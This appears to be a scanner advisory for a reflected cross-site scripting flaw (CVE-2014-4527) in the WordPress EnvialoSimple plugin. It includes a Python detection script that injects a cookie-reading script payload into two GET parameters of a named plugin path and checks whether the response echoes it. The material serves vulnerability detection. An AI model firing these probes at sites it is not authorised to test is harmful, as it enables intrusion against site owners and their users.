Summary
This host is running the WordPress EnvialoSimple plugin, which is prone to multiple reflected cross-site scripting vulnerabilities.
Impact
Successful exploitation will allow an attacker to execute arbitrary HTML and script code in a user's browser session in the context of the affected site.
Impact Level: Application
Solution
Upgrade to version 1.98 or later.
For updates refer to http://wordpress.org/plugins/envialosimple-email-marketing-y-newsletters-gratis
Insight
The flaw exists because the paginas/vista-previa-form.php script does not validate or encode input passed in the 'FormID' and 'AdministratorID' GET parameters before returning it to the user.
Affected
WordPress EnvialoSimple: Email Marketing and Newsletters Plugin version 1.97, and possibly prior.
Detection
Send crafted data via an HTTP GET request and check whether the injected script is reflected unescaped in the response (for example, a script that reads the cookie).
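The following is an added example of the detection step above and is not the scanner's own check or the plugin's code. It builds the probe URL for each of the two GET parameters the Insight names, then decides from the response body whether the payload came back verbatim (vulnerable), HTML-encoded (fixed), or not at all. The plugin directory is assumed from the wordpress.org slug in the Solution URL, and the two response bodies are constructed here for offline use; a live host is only contacted through the optional fetch function.

```python
"""Reflected-XSS check for the GET parameters named in the advisory."""
import html
from urllib.parse import urlencode, urljoin
from urllib.request import urlopen

# Assumed location: the wordpress.org slug from the Solution URL under the
# standard wp-content/plugins/ directory. Script path and parameter names are
# those the advisory names.
PLUGIN_DIR = "wp-content/plugins/envialosimple-email-marketing-y-newsletters-gratis/"
SCRIPT = "paginas/vista-previa-form.php"
PARAMS = ("FormID", "AdministratorID")

# Marker payload of the kind the Detection step describes: if it executes it
# reads the cookie, and its literal text is easy to look for in the response.
PAYLOAD = "<script>alert(document.cookie)</script>"


def build_probe_url(base_url: str, param: str, payload: str = PAYLOAD) -> str:
    """Return the GET URL that injects `payload` into the one parameter `param`."""
    path = urljoin(base_url.rstrip("/") + "/", PLUGIN_DIR + SCRIPT)
    return path + "?" + urlencode({param: payload})


def classify(body: str, payload: str = PAYLOAD) -> str:
    """Classify a response body as vulnerable, escaped or not-reflected.

    A verbatim echo means the angle brackets reach the HTML parser as tags.
    An echo as &lt;script&gt;... is the fixed behaviour: the markup is inert.
    Caveat: this string match assumes the echo lands in element content; an
    echo inside a quoted attribute would need a quote-breaking payload to be
    exploitable, so confirm the context manually before reporting.
    """
    if payload in body:
        return "vulnerable"
    if html.escape(payload, quote=True) in body or html.escape(payload, quote=False) in body:
        return "escaped"
    return "not-reflected"


def http_fetch(url: str, timeout: float = 10.0) -> str:
    """Fetch a URL and return the body as text (only used against a live host)."""
    with urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def check_host(base_url: str, fetch=http_fetch) -> dict:
    """Probe both parameters; `fetch(url)` must return the response body as str."""
    return {param: classify(fetch(build_probe_url(base_url, param))) for param in PARAMS}


# Constructed sample responses (not captured from a real site).
# 1.97 behaviour as the Insight describes it: the parameter value is echoed raw.
VULNERABLE_RESPONSE = "<html><body><p>Form: " + PAYLOAD + "</p></body></html>"
# Fixed behaviour: the same value echoed through an HTML encoder.
ESCAPED_RESPONSE = "<html><body><p>Form: " + html.escape(PAYLOAD) + "</p></body></html>"


def fake_fetch(url: str) -> str:
    """Offline stand-in for http_fetch: AdministratorID unfixed, FormID fixed."""
    return VULNERABLE_RESPONSE if "AdministratorID=" in url else ESCAPED_RESPONSE


if __name__ == "__main__":
    print(build_probe_url("http://example.test", "FormID"))
    print(check_host("http://example.test", fetch=fake_fetch))
```

Run it against a real install by calling `check_host("http://target/")` with the default `http_fetch`; anything other than "not-reflected" for both parameters indicates the script is still echoing the input, and "vulnerable" is the condition the advisory describes.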
References
CVE-2014-4527
Severity
CVSS Base Score: 4.3
CVSS Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
Classification
CVE: CVE-2014-4527